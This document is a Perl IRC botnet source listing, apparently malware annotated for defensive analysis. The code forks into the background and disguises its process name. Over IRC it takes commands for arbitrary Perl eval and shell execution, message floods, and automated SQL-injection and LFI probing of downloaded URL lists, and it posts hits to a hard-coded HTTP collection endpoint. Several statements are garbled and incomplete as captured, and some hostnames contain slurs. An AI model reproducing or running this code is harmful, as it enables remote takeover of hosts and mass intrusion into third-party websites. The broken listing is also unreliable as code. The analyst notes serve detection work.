#!/usr/bin/perl
# ---------------------------------------------------------------------------
# ANALYST NOTES (defensive review; only layout and comments were changed)
#
# What this is: a Perl bot controlled over IRC. It connects to a hard-coded
# IRC server, joins a keyed home channel, and runs commands received in
# PRIVMSG lines that start with the bot's nick or with $botcmd ("!e").
#
# Capabilities visible in this listing:
#   * arbitrary Perl evaluation of operator-supplied text (!eval, !reval)
#   * arbitrary command execution via fork/exec (!shell)
#   * raw IRC line injection, message and CTCP repetition (!raw, !flood,
#     !ctcpflood)
#   * automated SQL-injection and local-file-inclusion probing of URLs taken
#     from a downloaded list (!podajsql, !podajlfi); hits are reported to the
#     channel and to the HTTP endpoint in $savev
#
# Host artefacts visible in this listing:
#   * forks and lets the parent exit; overwrites $0 twice (last value "aVe")
#   * PID file "$botdir/$nick.pid" under /tmp, with a random letter-only nick
#   * crash log "/tmp/$nick.crashlog"
#   * download targets "/tmp/<integer 0-99>", fetched with wget and removed
#     with rm -rf
#
# Network indicators visible in this listing:
#   * the host names in @servers / $server (including the commented-out list),
#     TCP port 6667, channels "#voo" and "#spyz"
#   * the $savev URL with query parameters co=sql_v / lfi_v / lfienv_v
#   * the fixed User-Agent strings in getreq()
#   * the hex marker 0x4655434b5f465245455f574f524c44 ("FUCK_FREE_WORLD")
#     placed in probe URLs by sqlbrute()
#
# Capture quality: this page lost characters in extraction. Several
# statements are incomplete and the listing does not parse as shown; they are
# reproduced unchanged and marked "incomplete as captured". The names oident,
# get_content, $host, $usefish, $prefix, $fishkey and the LOG handle are used
# but never defined in this listing.
# ---------------------------------------------------------------------------
use POSIX;
use Time::HiRes qw ( setitimer ITIMER_REAL time sleep );

# Use IO::Socket::INET6 when it can be loaded, otherwise IO::Socket::INET.
# $whichnet holds the class name later used to open the IRC socket.
eval { require IO::Socket::INET6; };
if ($@) {
    use IO::Socket::INET;
    $whichnet="IO::Socket::INET";
} else {
    import IO::Socket::INET6;
    $whichnet="IO::Socket::INET6";
}

# --- Hard-coded configuration (all values below are indicators) -------------
# Active server list; the rest of the original list is commented out.
my @servers = ('irc.byroe.org');
#,'japierole.abuser.eu','zlo.hack-inter.net','jestemzly.abuser.eu','ihujze.bot.nu','hujwto.biz.tm','rocknrolla.h4ck.la','howkurwatoo.linuxsecured.net','fuckinigger.happyforever.com','qwlkejqlkj.melon.org.ru');
my $server='irc.byroe.org';
my $home="#voo";                  # home channel, joined with $homekey
my @channels=("#spyz");           # additional channels joined after welcome
# HTTP endpoint that receives scan results (see dodaj()).
my $savev="http://www.avefubu.webd.pro/vte/tra/dodaj.php";
my $port="6667";
# Nick, real name and ident all come from larasuka(), the random-letter helper.
my $nick=larasuka(7);
my $realname=larasuka(7);
my $jupe="$nick";
my $oident_spoof="$nick";
my $jupeon="on";
my $ident=larasuka(7);
my $botcmd="!e";                  # alternative command prefix besides the nick
#my $botcmd="!".$literaki[int(rand(@literaki))];
my $homekey="itakcitoukradna";
my $usermodes='+igs';
my $oidentd="0";
my $min_lag_show='15';
my $shell_cmd_timeout="60";       # seconds; used by the ALRM handler below
my @admin=('spy');
my $aop_admin="0";
my @aop_others=('');
my $outputchan=$home;
my $VERSION = "V";
my $max_lines='2';                # lines flushed from the send queue per tick
my $process = "ihujcieto";
my $verbot = ".666";
my $banner = "[evil]:";

# --- Backgrounding and process-name masquerade ------------------------------
# fork; the parent exits so the child keeps running detached from the caller.
my $pid=fork;
my $starttime=time();
exit if $pid;
# $0 is overwritten here and again further down, so the name shown in process
# listings does not match the script.
$0="$process"."\0"x16;
my $botdir="/tmp/";
$lastmsgtime = time();
my $chancount = @channels;
my $admincount = @admin;
my $aop_otherscount = @aop_others;
#local $SIG{__WARN__} = {};
$SIG{'PIPE'} = "IGNORE";
# Signal setup for INT/QUIT/HUP/TERM and __DIE__.
# NOTE(review): as captured, the right-hand sides are sub calls; confirm
# against the original sample.
foreach my $sig qw(INT QUIT HUP TERM) {
    $SIG{$sig} = &handler;
}
$SIG{__DIE__} = &sigdie_handler;

# Prints a debug line to stdout.
sub debug { print $_[0]."\n" }

my($maxsite,$v_threads,$get_timeout) = (20,15,5);
$0 = "aVe";

# --- Single-instance guard via PID file in /tmp -----------------------------
# If "$botdir/$nick.pid" exists, the stored PID is probed with kill(); a
# non-zero result is treated as "already running" and the script exits.
if (-e "$botdir/$nick.pid") {
    open (PID, "<$botdir/$nick.pid");
    # Incomplete as captured: the right-hand side of this assignment is missing.
    my $checkpid = ;
    close (PID);
    if(kill(SIGCHLD,$checkpid)!=0) {
        print "[-] already running ($checkpid) exiting\n";
        exit;
    }
}
open (PID, ">$botdir/$nick.pid");
print PID "$$";
close (PID);

# Appends $_[0] random letters from @abc to the global $meh and returns $meh.
# $meh is not reset between calls.
sub larasuka {
    my @abc = ('a' .. 'z');
    for(my $i=0;$i<$_[0];$i++) {
        $meh .= $abc[int(rand($#abc))];
    }
    return $meh;
}

# Announces the signal name in $home, sends QUIT, then exits.
sub handler {
    local($sig) = @_;
    sendraw("PRIVMSG $home :recieved SIG$sig");
    quit("recieved SIG$sig");
    close LOG;
    sleep(2);
    exit(0);
}

# Appends the die message and a Carp::longmess() trace to /tmp/$nick.crashlog.
sub sigdie_handler {
    open CRASHLOG, ">>/tmp/$nick.crashlog" or warn "Could not open crashlog '$nick.crashlog' for writing: $!";
    print CRASHLOG "Died with: $_[0]\n\n", Carp::longmess(), "\n=====\n\n\n";
    close CRASHLOG;
}

### first time connect
# NOTE(review): the final statement of the file is "goto START"; as captured
# this line reads "START;" rather than a label.
START;
oident;
undef $realnick;
my ($sentlines, $alarms, $lag, $publag, $lsent, @lq) = (0, 0, 0, 0, 0, ());
debug "connecting to $server:$port\n";
# Outbound TCP connection to the IRC server; on failure reconnect() is called.
my $ircsock = $whichnet -> new(PeerAddr => $server, PeerPort => $port, LocalAddr => $host, Proto => 'tcp', Timeout => '10') or reconnect($!);
if (defined($ircsock)) {
    debug "connection established, initiating\n";
    $ircsock->autoflush(1);
    identify();
};

# --- Timer tick -------------------------------------------------------------
# Runs on every SIGALRM (see setitimer below):
#   * flushes part of the send queue
#   * kills a running shell child with signal 9 once no IRC line has been
#     received for $shell_cmd_timeout seconds
#   * at tick 45 sends ISON for the nick in $jupe
#   * at tick 60 resets the counter and either reconnects (600 s without a
#     received line) or sends itself a LAGSTAT notice to measure lag
$SIG{ALRM} = sub {
    sendqueue("de-queue");
    $alarms++;
    if ($shell and time() - $lastmsgtime >= $shell_cmd_timeout) {
        kill 9, $shell;
        msg($sendto, "Killed: $shell");
    }
    if ($alarms eq "45" and defined($realnick) and $realnick ne $jupe) {
        sendqueue("ISON $jupe");
    }
    if ($alarms >= "60") {
        $alarms=0;
        if (time() - $lastmsgtime >= "600" and $connd eq 1) {
            $lastmsgtime = time();
            reconnect('TIMEOUT');
        } else {
            if (defined($realnick) && $connd eq 1) {
                notice($realnick, "LAGSTAT " . time);
                $lagstat=time();
                $sentlines=0;
            }
        }
    }
};
# Arms the real-time interval timer with arguments (1, 1).
setitimer(ITIMER_REAL, 1, 1);

# Returns a "[HH:MM.SS] " timestamp string for the local time.
sub TS {
    return "[" . strftime("%H:%M.%S",localtime(time())) . "] ";
}

# Drops the current connection state, waits, picks an entry from @servers and
# opens a new IRC connection. Calls itself again if the new socket fails.
sub reconnect {
    $connd=0;
    undef @lq;
    undef $realnick;
    debug "error: $_[0] ..\n";
    if (defined($ircsock)) {
        close $ircsock;
        undef $ircsock;
    };
    sleep "1" for 1..10;
    my $server=();
    my $server=$servers[int(rand($#servers))];
    debug "Reconnecting...\n";
    debug "Connecting to $server:$port\n";
    oident;
    $ircsock = $whichnet -> new(PeerAddr => $server, PeerPort => $port, LocalAddr => $host, Proto => 'tcp', Timeout => '10') or reconnect($!);
    if (defined($ircsock)) {
        $ircsock->autoflush(1);
        identify();
    };
}

# --- Main receive loop ------------------------------------------------------
# Reads one IRC line at a time and reacts to it. Every received line is also
# echoed through debug().
while($line = <$ircsock>){
    $lastmsgtime = time();
    $line =~ s/\r\n$//;
    $connd=1;
    debug "[RECV]: $line\n";

    # NOTICE from the bot to itself carrying LAGSTAT: compute and report lag.
    if ($line =~ /^\:(.+?)\!(.+?)\@(.+?) NOTICE (.+?) \:(.+)/) {
        my $from=$1;
        my $hostmaircsock=$3;
        my $to=$4;
        my $args=$5;
        my $mask="$2\@$hostmaircsock";
        if ($to eq $realnick and $from eq $realnick and $args =~ /^LAGSTAT (.+)/) {
            $lag = time() - $lagstat;
            $lag = substr($lag, 0, 4);
            if ($lag > $min_lag_show or $publag eq 1) {
                msg($outputchan, "[Lag]: $lag Second(s)");
                $lagstat=time();
                $outputchan=$home;
                $publag=0;
            }
        }
    }

    # PRIVMSG: optional Blowfish decryption, CTCP reporting, then command
    # dispatch.
    if ($line =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/) {
        my $from=$1;
        my $hostmaircsock=$3;
        my $to=$4;
        my $args=$5;
        my $mask="$hostmaircsock\E";
        $fishmsg=0;
        # Only taken when $usefish is defined; it is never set in this listing.
        if (defined($usefish) && $args =~ /^\Q$prefix\E(.+)/i) {
            $fishmsg=1;
            my $blowfish = new Crypt::ircBlowfish;
            $blowfish->set_key($fishkey);
            $args=$blowfish->decrypt($1);
        }
        # CTCP requests sent to the bot are reported to the home channel.
        if ($args =~ /\001PING.*\001$/) { msg("$home", "[Ping] from: $from");}
        if ($args =~ /\001USERINFO.*\001$/) { msg("$home", "[Userinfo] from: $from");}
        if ($args =~ /\001TIME.*\001$/) { msg("$home", "[Time] from: $from");}
        if ($args =~ /^\001VERSION\001$/) {
            notice("$from", "\001VERSION $VERSION\001");
            { msg("$home", "[Version] from: $from");}
        }
        # NOTE(review): the check of the sender mask against @admin is
        # commented out, so in this listing command dispatch does not depend
        # on who sent the line.
        #if (grep {$_ =~ /^\Q$mask\E$/i } @admin ) {
        # A command is "<nick or $botcmd> !<command> ..."; it goes to cmdcase().
        if ($args =~ /^(\Q$realnick\E|\Q$botcmd\E)\s+(.*)/i ) {
            my $arg = $2;
            if ($arg =~ /^\!(.*)/) {
                cmdcase("$from","$to","$arg");
            }
        }
        #}
    }

    # Everything that is not a PRIVMSG: server housekeeping.
    # NOTE(review): the line break inside the next pattern is present in the
    # page capture and is kept as-is.
    if ($line !~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) 
\:(.+)/) {
        if ($line=~ /^ERROR \:(.*)/) { reconnect($1); }
        # Answer server PING; identify if not yet marked connected.
        if ($line=~ /^PING \:(.*)/) {
            sendraw("PONG :$1");
            if (not $connd) {
                $connd=1;
                identify();
            }
        }
        if ($line=~ /^\:(.+?)\s+451 (.+) \:You have not registered/) { identify(); }
        # NICK change: track the bot's own nick.
        if ($line =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i) {
            if (lc($1) eq lc($realnick)) { sendraw("MONITOR - $1"); }
            if (lc($1) eq lc($jupe) and lc($1) eq lc($realnick) and $jupe eq "on") { nick("$jupe"); }
            if (lc($1) eq lc($realnick)) { $realnick=$4; }
        }
        # JOIN: give +o to hosts matching @admin / @aop_others when enabled.
        if ($line =~ /^\:(.+?)\!(.+?)\@(.+?)\s+JOIN\s+\:(\S+)/) {
            $mask="$3";
            if (grep {$_ =~ /^\Q$mask\E$/i } @admin and $aop_admin eq "1") {
                op("$4", "$1");
            } else {
                if ($1 ne $realnick and @aop_others ne '' && grep {$_ =~ /^\Q$mask\E$/i } @aop_others) {
                    op("$4", "$1");
                }
            }
        }
        # INVITE from a host matching @admin: join the named channel.
        if ($line =~ /^\:(.+?)\!(.+?)\@(.+?)\s+INVITE\s+(.+?)\:(\S+)/) {
            $mask="$3";
            if (grep {$_ =~ /^\Q$mask\E$/i } @admin ) {j("$5");}
        }
        # Numeric 718: ACCEPT the sender when its host matches @admin.
        # (presumably the caller-id notice that goes with user mode +g; confirm)
        if ($line =~ /^\:(.+?)\s+718 (.+?) (.+?) (.+?)\@(.+?) (.*)/) {
            $mask="$5";
            if (grep {$_ =~ /$mask\E$/i } @admin ) {
                sendraw("ACCEPT $3");
                notice($3, "Accepted.");
            }
        } else {
            if ($line =~ /^\:(.+?)\s+718 (.+?) (.+?) (.+?)\@(.+?) (.*)/) {
                msg("$home", "[Msg] From $3");
            }
        }
    }

    # Numeric 433 before a nick is confirmed: retry with a random letter added.
    if ($line =~ /^\:(.+?)\s+433 (.+) (.+) \:/ and !defined($realnick)) {
        $randc=@{[ 'a' .. 'z' , 'A' .. 'Z' ]}[int(rand(26 * 2))];
        if (length("$3_") > 9) {
            nick(substr($3, 0, 8).$randc);
        } else {
            nick($3.$randc);
        }
    }
    # Numerics 47x: relay the text to the home channel.
    if ($line =~ /^\:(.+?)\s+47(.{1}) (.+) (.+) \:(.+)/) { msg("$home", "$4 $5"); }
    # Numerics 730/731/732: replies to the MONITOR commands sent elsewhere in
    # this file; 731 triggers a nick change while $jupeon is "on".
    if ($line =~ /^\:(.+?)\s+730 (.*) \:(.*)!/) {
        if ($realnick ne $3) {msg("$home", "Jupe: $3");}
    }
    if ($line =~ /^\:(.+?)\s+731 (.+) \:(.+)/) {
        if ($jupeon eq "on") {nick("$3");}
    }
    if ($line =~ /^\:(.+?)\s+732 (.*) \:(.*)/) {
        msg("$outputchan", "Monitoring: $3.");
        $outputchan=$home;
    }
    # Numeric 001: record the nick, set user modes, join $home with its key,
    # greet, join @channels and start monitoring $jupe.
    if ($line =~ m/^\:(.+?)\s+001\s+(\S+)\s/) {
        $realnick = $2;
        $connd=1;
        sendraw("MODE $realnick $usermodes");
        j("$home $homekey");
        msg("$home", "Hello Voo_Doo");
        foreach my $chans (@channels) {
            j("$chans") if $chans ne "";
        }
        if ($realnick ne $jupe) {sendraw("MONITOR + $jupe");}
    }
    # KICK of the bot itself: rejoin the channel.
    if ($line =~ /^\:(.+?)\!(.+?)\@(.+?) KICK (.+?) (.+?) \:(.*)/) {
        my $from=$1;
        my $hostmaircsock=$3;
        my $where=$4;
        my $who=$5;
        if ($who eq $realnick) {j("$where");}
    }
    # QUIT of the nick held in $jupe: try to take that nick.
    if ($line =~ /^\:(.+?)\!(.+?)\@(.+?) QUIT \:(.*)/) {
        if (lc($1) eq lc($jupe) and $jupeon eq "on") {nick("$jupe");}
    }
    # Numeric 332 for the home channel: matched but nothing is done.
    if ($line =~ m/^\:(.+?)\s+332 (.+?) (.+?) \:(.+)/i and lc($3) eq lc($home)) { }
    # Numeric 303 with an empty list: take the nick in $jupe.
    if ($line =~ m/^\:(.+?)\s+303 (.*) \:(.*)/i) {
        if (!$3) { nick("$jupe"); }
    }
}

# --- Command dispatcher -----------------------------------------------------
# Arguments: sender nick, target (channel or the bot's nick), command text
# starting with "!". Replies go to the sender for private messages, otherwise
# to the channel. Each command is matched by its own regex.
sub cmdcase {
    ($from, $to, $args) = @_;
    if ($to eq $realnick){
        $sendto=$from;
    } else {
        $sendto=$to;
    }
    # IRC housekeeping commands.
    if ($args=~ /^!nick (.+)/i){
        sendraw("MONITOR - $realnick");
        nick("$1");
    }
    if ($args=~ /^!cq$/i){
        $qc = @lq;
        undef @lq;
        msg("$sendto", "cleared \002$qc\002 items from queue");
    }
    if ($args=~ /^!die$|^!die (.*)/i){ quit("$1"); sleep 1; exit; }
    if ($args=~ /^!quit$|^!quit (.*)/i){ quit("$1"); sleep 1; exit; }
    # Sends an operator-supplied line to the IRC server unchanged.
    if ($args=~ /^!raw (.+)/i){ sendqueue("$1"); }
    if ($args=~ /^!lag$/i){ msg("$sendto", "Lag: $lag"); }
    if ($args=~ /^!reallag$/i){
        $outputchan=$sendto;
        $publag=1;
        notice($realnick, "LAGSTAT " . time);
        $lagstat=time();
    }
    if ($args=~ /^!join (.+)/i){ j("$1 $2"); }
    if ($args=~ /^!part (.+)/i){ p("$1 $2"); return; }
    if ($args=~ /^!part$/i) { p("$sendto"); return; }
    if ($args=~ /^!hop$/i){ p("$sendto"); j("$sendto"); }
    if ($args=~ /^!cycle (.+)/i){ p("$1 $2"); j("$1 $2"); return; }
    if ($args=~ /^!cycle$/i){ p("$sendto"); j("$sendto"); return; }
    # SECURITY: string eval of text received over IRC, i.e. remote execution
    # of arbitrary Perl inside the bot process. !eval reports errors, !reval
    # reports the result.
    if ($args=~ /^!eval (.+)/i) {
        eval "$1";
        if ($@) {
            foreach my $err (split(/\n/,$@)) {
                msg("$sendto", $err)
            }
        }
    }
    if ($args=~ /^!reval (.+)/i) {
        my $vars=eval $1;
        foreach my $var (split(/\n/,$vars)) {
            msg("$sendto", $var);
        }
    }
    # Nick-watching ("jupe") control through the MONITOR command.
    if ($args=~ /^!jupe (.+)/i){
        $jupe=$1;
        $jupeon="on";
        $jupe=~ s/ /\,/g;
        sendraw("MONITOR - $realnick");
        sendraw("MONITOR + $jupe");
        $jupe=~ s/\,/ /g;
    }
    if ($args=~ /^!jupelist$/i){
        $outputchan=$sendto;
        sendraw("monitor l");
    }
    if ($args=~ /^!jupeoff$/i){
        msg("$sendto", "[Jupe]: Halted");
        if ($jupeon eq "on") {
            sendraw("monitor c");
            $jupeon="off";
            $jupe=$realnick;
        }
    }
    if ($args=~ /^!status$/i){
        msg("$sendto", "Jupe: $jupeon");
        $outputchan=$sendto;
        sendraw("monitor l");
    }
    if ($args=~ /^!op\s+(\S+) (.+)/i){ op("$sendto", "$2"); return; }
    if ($args=~ /^!op$/i) { op("$sendto", "$from"); return; }
    if ($args=~ /^!deop\s+(\S+) (.+)/i){ deop("$1", "$2"); }
    #----------------------------------------------------------------------
    # SECURITY: !podajsql / !podajlfi. The operator-supplied argument is
    # interpolated into a backtick wget command (shell execution), the result
    # is saved as /tmp/<integer 0-99>, and each line of that file is fed to
    # sqlbrute() / podajlfi(). The work runs in a double-forked child. The
    # file is removed with rm -rf afterwards.
    if ($args=~ /^!podajsql (.+)/i){
        srand();
        if(my $xid = fork){
            waitpid($xid,0);
        } else{
            if(fork){
                exit;
            } else{
                my $save = "/tmp/".int(rand(1)*100);
                `wget $1 -O $save`;
                my $czaj = $save;
                open(FILE, $czaj);
                print("open $czaj \r\n");
                # Incomplete as captured: the loop condition is empty.
                while() {
                    my $jo=$_;
                    chomp $jo;
                    $jo=~s/\n//;
                    $jo=~s/\r//;
                    # Keeps the line up to and including the first "=".
                    if($jo=~ /(.*?[=])/g){
                        &sqlbrute($1);
                    }
                }
                close(FILE);
                `rm -rf $czaj`;
            }
            exit;
        }
    }
    if ($args=~ /^!podajlfi (.+)/i){
        if(my $xid = fork){
            waitpid($xid,0);
        } else{
            if(fork){
                exit;
            } else{
                my $save = "/tmp/".int(rand(1)*100);
                `wget $1 -O $save`;
                my $czaj = $save;
                open(FILE, $czaj);
                print("open $czaj \r\n");
                # Incomplete as captured: the loop condition is empty.
                while() {
                    my $jo=$_;
                    chomp $jo;
                    $jo=~s/\n//;
                    $jo=~s/\r//;
                    if($jo=~ /(.*?[=].\/)/g){
                        &podajlfi($1);
                    }
                }
                close(FILE);
                `rm -rf $czaj`;
                sendraw("PRIVMSG #voo End Lfi");
            }
            exit;
        }
    }
    # Message relaying and repetition.
    if ($args=~ /^!msg\s+(\S+) (.+)/i){ msg("$1", "$2"); }
    if ($args=~ /^!say\s+(.+)/i){ msg("$sendto", "$1"); }
    if ($args=~ /^!uptime$/i){ msg("$sendto", &uptime); }
    if ($args=~ /^!killshell$/i){ close(SHELL) || msg("$sendto", "child exited $?"); }
    # SECURITY: runs an operator-supplied command line on the host (see shell()).
    if ($args=~ /^!shell (.+)/i){ shell("$sendto", "$1"); }
    if ($args=~ /^!notice\s+(\S+) (.+)/i){ notice("$1", "$2"); }
    # Sends the same message / CTCP to a target the requested number of times.
    if ($args=~ /^!flood\s+(\d+)\s+(\S+) (.*)/i) {
        for (my $cf = 1; $cf <= $1; $cf++) {
            msg("$2", "$3");
        }
    }
    if ($args=~ /^!ctcp\s+(\S+) (.*)/i) { ctcp("$1", "$2"); }
    if ($args=~ /^!ctcpflood\s+(\d+)\s+(\S+) (.*)/i) {
        for (my $cf = 1; $cf <= $1; $cf++) {
            ctcp("$2", "$3");
        }
    }
    if ($args=~ /^!reconnect$/i){ reconnect("requested by $from"); }
    # Removes "$nick.pid" in the current directory and runs "perl $nick"
    # through the shell, then calls handler().
    if ($args=~ /^!restart$/i){
        system("rm $nick.pid; perl $nick");
        handler("restart");
    }
    ######################################################################################
    ######################################################################################
}

# Deparses the sub named in $_[1] with B::Deparse and sends its source text,
# line by line, to the target in $_[0].
sub inspect {
    my $where=$_[0];
    my $what=$_[1];
    use B::Deparse;
    my $sub = (B::Deparse->new)->coderef2text(\&{$what});
    $sub =~ s/$_->[0]/$_->[1]/g foreach (["\x09", " "]);
    foreach my $line (split /\n/, $sub) {
        msg($where, $what .": $line");
    }
}

# --- Thin IRC helpers -------------------------------------------------------
# Each helper checks its argument count where shown and queues or sends one
# IRC line.
sub ctcp { return unless $#_ == 1; sendqueue("PRIVMSG $_[0] :\001$_[1]\001"); }
sub notice { return unless $#_ == 1; sendqueue("NOTICE $_[0] :$_[1]"); }
sub op { return unless $#_ == 1; sendqueue("MODE $_[0] +o $_[1]"); }
sub deop { return unless $#_ == 1; sendqueue("MODE $_[0] -o $_[1]"); }
sub j { &join(@_); }
sub join { return unless $#_ == 0; sendqueue("JOIN $_[0]"); }
sub p { part(@_); }
sub part { sendqueue("PART $_[0]"); }
sub nick { return unless $#_ == 0; sendraw("NICK $_[0]"); }
# Clears the send queue, then sends QUIT with the given message.
sub quit { undef @lq; sendraw("QUIT :$_[0]"); }
# Registers with the server: USER line followed by NICK.
sub identify {
    sendraw("USER $ident 0 $server :$realname");
    sendraw("NICK $nick");
}

# Returns "[Bot Uptime]: D days, H hours, M minutes, S seconds." computed from
# $starttime with gmtime().
sub uptime {
    my $curtime=time();
    $secs=int($curtime - $starttime);
    @parts = gmtime($secs);
    $uptime=sprintf("%s days, %s hours, %s minutes, %s seconds.",@parts[7,2,1,0]);
    return "[Bot Uptime]: $uptime"
}

# Writes one line to the IRC socket immediately (bypassing the queue) and
# calls reconnect() if the write fails. Does nothing without a socket.
sub sendraw {
    if (!defined($ircsock)) { return; }
    my $text = shift;
    chomp($text);
    $sentlines++;
    $text = $text . "\r\n";
    debug "SEND: $text";
    print $ircsock $text or reconnect('couldnt sendraw');
}

# --- SQL-injection prober ---------------------------------------------------
# For the URL prefix in $_[0], requests UNION SELECT probe URLs with a growing
# column count (loop bound $columns = "20"). The probe carries the hex marker
# 0x4655434b5f465245455f574f524c44; when the response contains
# "FUCK_FREE_WORLD" the URL is posted to #voo and reported through dodaj().
# Detection: the marker and the "-1+union+select+" sequence appear verbatim in
# the requested URL.
sub sqlbrute() {
    my $To=$home;
    my $site=$_[0];
    my $columns="20";
    my $cfin.="--";
    my $cmn.= "+";
    for($column=0;$column<$columns;$column++) {
        $union.=','.$column;
        $inyection.=','."0x4655434b5f465245455f574f524c44";
        if ($column == 0) {
            $inyection = '';
            $union = '';
        }
        $sql=$site."-1".$cmn."union".$cmn."select".$cmn."0x4655434b5f465245455f574f524c44".$inyection.$cfin;
        $response=&getreq($sql);
        if($response =~ /FUCK_FREE_WORLD/) {
            $column ++;
            $sql=$site."-1".$cmn."union".$cmn."select".$cmn."0".$union.$cfin;
            sendraw("PRIVMSG #voo $sql");
            &dodaj("sqlczyste",$sql);
            #print $sqlv "$sql \n";
            #&dodaj('sqltable', $sql);
        }
    }
}

# --- Local-file-inclusion prober --------------------------------------------
# Appends four fixed traversal suffixes to the URL prefix in $_[0] (to
# /etc/passwd and /proc/self/environ, each with and without "%00") and checks
# the response for "root:x:" or "HTTP_ACCEPT". Hits are posted to #voo and
# reported through dodaj().
# NOTE(review): get_content is not defined in this listing, and the last
# dodaj() call passes $lfie2, which is never assigned.
# Detection: the traversal suffixes appear verbatim in the requested URL.
sub podajlfi() {
    my $To=$home;
    my $site=$_[0];
    my $lfi = $site."./../../../../../../../../../../../etc/passwd";
    $co=&get_content($lfi);
    if($co =~ /root:x:/) {
        sendraw("PRIVMSG #voo $lfi");
        &dodaj("lfi",$lfi);
    }
    my $lfi2 = $site."./../../../../../../../../../../../etc/passwd%00";
    $co2=&get_content($lfi2);
    if($co2 =~ /root:x:/) {
        sendraw("PRIVMSG #voo $lfi2");
        &dodaj("lfi",$lfi2);
    }
    my $lfie = $site."./../../../../../../../../../../../proc/self/environ%00";
    $coe=&get_content($lfie);
    if($coe =~ /HTTP_ACCEPT/) {
        sendraw("PRIVMSG #voo $lfie");
        &dodaj("lfienv",$lfie);
    }
    my $lfi2e = $site."./../../../../../../../../../../../proc/self/environ";
    $co2e=&get_content($lfi2e);
    if($co2e =~ /HTTP_ACCEPT/) {
        sendraw("PRIVMSG #voo $lfi2e");
        &dodaj("lfienv",$lfie2);
    }
}

# Queues a PRIVMSG to $_[0]. When $usefish is defined and the triggering
# message was encrypted ($fishmsg), the text is encrypted with
# Crypt::ircBlowfish first.
sub msg {
    return unless $#_ == 1;
    if (defined($usefish) && $fishmsg eq 1) {
        my $blowfish = new Crypt::ircBlowfish;
        my $encrypted_message = '';
        my $cleartext = '';
        $blowfish->set_key($fishkey);
        $encrypted_message = $prefix . $blowfish->encrypt($_[1]);
        sendqueue("PRIVMSG $_[0] :$encrypted_message");
    } else {
        sendqueue("PRIVMSG $_[0] :$_[1]");
    }
}

use MIME::Base64;

# --- Result reporting over HTTP ---------------------------------------------
# Base64-encodes the URL in $_[1] and requests
# "$savev?co=<sql_v|lfi_v|lfienv_v>&link=<base64>" depending on $_[0].
# Detection: GET requests to the $savev path with these "co" values.
sub dodaj() {
    my $co = $_[0];
    my $link = $_[1];
    my $linkraz = $_[2];
    my $links = encode_base64($link);
    my $lindwa = encode_base64($linkraz);
    $links=~s/\n//;
    $links=~s/\r//;$lindwa=~s/\n//;
    $lindwa=~s/\r//;
    if($co eq "sqlczyste") {
        my $safet = $savev.'?co=sql_v&link='.$links;
        &getreq($safet);
    }
    if($co eq "lfi") {
        my $safet = $savev.'?co=lfi_v&link='.$links;
        &getreq($safet);
    }
    if($co eq "lfienv") {
        my $safet = $savev.'?co=lfienv_v&link='.$links;
        &getreq($safet);
    }
    #--------------------------------------------------------- _LFI
}

# Percent-encodes a fixed set of nine characters (space becomes "+").
sub urlencode($){
    my $unclean = shift;
    $unclean =~ s/\?/\%3f/gi;
    $unclean =~ s/ /\+/gi;
    $unclean =~ s/:/\%3A/gi;
    $unclean =~ s/\//\%2F/gi;
    $unclean =~ s/&/\%26/gi;
    $unclean =~ s/\"/\%22/gi;
    $unclean =~ s/\'/\%27/gi;
    $unclean =~ s/,/\%2C/gi;
    $unclean =~ s/\\/\%5C/gi;
    return $unclean;
}

# Reverses the nine substitutions made by urlencode().
sub urldecode($){
    my $clean = shift;
    $clean =~ s/\%3f/\?/gi;
    $clean =~ s/\+/ /gi;
    $clean =~ s/\%3A/:/gi;
    $clean =~ s/\%2F/\//gi;
    $clean =~ s/\%26/&/gi;
    $clean =~ s/\%22/\"/gi;
    $clean =~ s/\%27/\'/gi;
    $clean =~ s/\%2C/,/gi;
    $clean =~ s/\%5C/\\/gi;
    return $clean;
}

# --- Minimal HTTP client ----------------------------------------------------
# Splits an "http://host/path" URL, opens a TCP connection to port 80 of the
# host and sends an HTTP/1.0 GET with a User-Agent taken from @ags. The whole
# response is read and returned after urldecode(). An alarm of $get_timeout
# seconds bounds the request.
# Detection: the four User-Agent strings below are fixed in this listing.
sub getreq($){
    my($url,$query,$xcon,$host,$get,@content,@ags) = ($_[0]);
    @ags = ("Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.6) Gecko/20050223 Firefox/1.0.1","Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.4) Gecko/20061201 Firefox/2.0.0.4 (Ubuntu-feisty)","Microsoft Pocket Internet Explorer/0.6","Microsoft Internet Explorer/4.0b1 (Windows 95)");
    $url =~ m/http:\/\/(.*?)\/(.*)/;
    ($host,$url,$query) = ($1,"$1/$2","/$2");
    eval{
        local $SIG{ALRM} = sub{print("[-] Timed out - $url\n");die;};
        alarm $get_timeout;
        $get = IO::Socket::INET->new(PeerAddr=>"$host:80",Proto=>"tcp") or sub{die("FAILED\n");};
        print $get "GET $query HTTP/1.0\r\nHost: $host\r\nUser-Agent: " . $ags[int(rand(0)*$#ags)] . "\r\nAccept: */*\r\nConnection: close\r\n\r\n";
        @content = <$get>;
        $xcon = "@content";
        close($get);
        alarm 0;
    };
    return urldecode($xcon);
}

#----------------------------
# --- Remote command execution -----------------------------------------------
# SECURITY: runs the operator-supplied command line. "cd <dir>" is handled
# with chdir() in the bot process itself. Anything else is run in a child
# created by open(SHELL, "-|"): the child calls exec() on the command string
# and the parent relays each output line to IRC as "[shell]: ...".
# Detection: child processes of a perl process whose name was rewritten, and
# their output appearing in outbound IRC traffic.
sub shell {
    my $where=$_[0];
    my $command=$_[1];
    if ($command =~ /cd (.*)/) {
        chdir("$1") || msg("$where", "no such file or directory");
        return;
    }
    debug "executing $command\n";
    $shell = open(SHELL, "-|");
    if ($shell) {
        # parent
        #waitpid($shell, 0);
        # Incomplete as captured: the right-hand side of the assignment in the
        # loop condition is missing.
        while (my $lines = ) {
            $lines = " " if !length($lines) or $lines eq "\n";
            msg("$where", "[shell]: $lines");
        }
        close(SHELL);
    } else {
        # child
        ($EUID, $EGID) = ($UID, $GID); # suid only
        exec("$command") || print "can't exec $command: $!";
        exit;
    }
    undef $shell;
}

# --- Outbound send queue ----------------------------------------------------
# Called with a line: appends it to @lq and returns 0. Called with 'de-queue'
# (from the ALRM handler): sends up to $max_lines queued lines, sleeping
# briefly once $sentlines exceeds 35, and returns 1. A failed write triggers
# reconnect().
sub sendqueue {
